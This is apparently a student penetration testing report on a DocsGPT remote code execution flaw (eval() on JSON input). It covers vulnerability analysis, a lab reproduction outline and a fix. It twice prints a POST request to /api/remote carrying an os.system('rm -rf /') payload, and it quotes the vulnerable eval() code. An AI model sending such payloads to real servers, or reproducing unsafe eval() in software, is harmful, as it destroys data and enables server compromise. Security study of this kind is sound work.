# Penetration Testing Project Report: Exploiting CVE-2025-0868 (DocsGPT RCE via JSON Eval)

## 1. Introduction

A critical Remote Code Execution (RCE) flaw (CVE-2025-0868) was disclosed on February 20, 2025, in the open-source DocsGPT library, caused by unsafe use of `eval()` when parsing JSON payloads. 

**Key Details:**
- Affects DocsGPT versions 0.8.1 through 0.12.0
- CVSS 4.0 score of 9.3 (CRITICAL)
- Allows unauthenticated, network-accessible code injection
- Full impact on confidentiality, integrity, and availability

### About CVE-2025-0868
This vulnerability permits attackers to run arbitrary Python code via the `/api/remote` endpoint. DocsGPT is an open-source generative-AI tool that enables querying project documentation using GPT models.

### Project Objectives
- Analyze the vulnerability's technical background
- Reproduce in a controlled lab environment
- Demonstrate exploitation impact
- Propose mitigation strategies
- Present conclusions

---

## 2. Vulnerability Analysis

### 2.1 Vulnerability Overview

| Category          | Details                                                                 |
|-------------------|-------------------------------------------------------------------------|
| CVE ID            | CVE-2025-0868                                                          |
| Affected Software | DocsGPT v0.8.1 – v0.12.0                                               |
| Vulnerability Type| Remote Code Execution (RCE)                                            |
| Attack Vector     | Network-based (HTTP request to `/api/remote`)                          |
| Root Cause        | Unsafe use of `eval()` on untrusted JSON input                         |
| Impact            | Full server compromise (arbitrary command execution)                   |
| CWE Mapping       | CWE-77: Improper Neutralization of Special Elements used in a Command  |

### 2.2 CVSS 4.0 Breakdown
**Vector:** `AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H`  
**Base Score:** 9.3 (CRITICAL)

**Exploitability Metrics:**
- **Attack Vector (AV):** Network (N)
- **Attack Complexity (AC):** Low (L)
- **Privileges Required (PR):** None (N)
- **User Interaction (UI):** None (N)

**Impact Metrics:**
- Confidentiality (VC): High
- Integrity (VI): High
- Availability (VA): High

### 2.3 Technical Deep Dive
The vulnerability exists in `reddit_loader.py` where user input is processed using the unsafe `eval()` function:

```python
def load_data(self, inputs):
    data = eval(inputs)  # Vulnerable code
    client_id = data.get("client_id")
    client_secret = data.get("client_secret")
    user_agent = data.get("user_agent")
```

This allows an attacker to execute malicious Python code inside JSON fields:
POST /api/remote HTTP/1.1
Content-Type: application/json

{"data": "__import__('os').system('rm -rf /')"}

# Exploitation of CVE-2025-0868 in DocsGPT

## 3. Exploitation Process

### 3.1 Lab Environment Setup

To exploit this vulnerability, we recreated the vulnerable environment and a safe working space using:

- **Virtual Machine**: Kali Linux 2024  
- **DocsGPT Version**: 0.12.0 *(vulnerable versions: 0.8.0 - 0.12.0)*  
- **Tools Used**: Python, Docker  

### 3.2 Exploit Development

We developed a Python script that executes Remote Code Execution (RCE) by sending a malicious payload to the `/api/remote` endpoint, exploiting the unsafe use of `eval()`.

#### Key Exploit Steps

1. **Reconnaissance**: Identify DocsGPT version via HTTP headers.  
2. **Define Vulnerability**: RCE in `/api/remote` endpoint.  
3. **Payload Crafting**: Inject Python code.  
4. **Exploitation**: Send malicious JSON to `/api/remote`.

#### Example of a Vulnerable Request

```http
POST /api/remote HTTP/1.1
Content-Type: application/json

{"data": "__import__('os').system('rm -rf /')"}
```

## 4. COUNTERMEASURES & MITIGATION

### 4.1 Immediate Fixes
Update to DocsGPT v0.12.1 and letter versions

### 4.2 Code Fix 

Replace eval() with json.loads().

Link:https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/applicatio
n/parser/remote/reddit_loader.py#L9

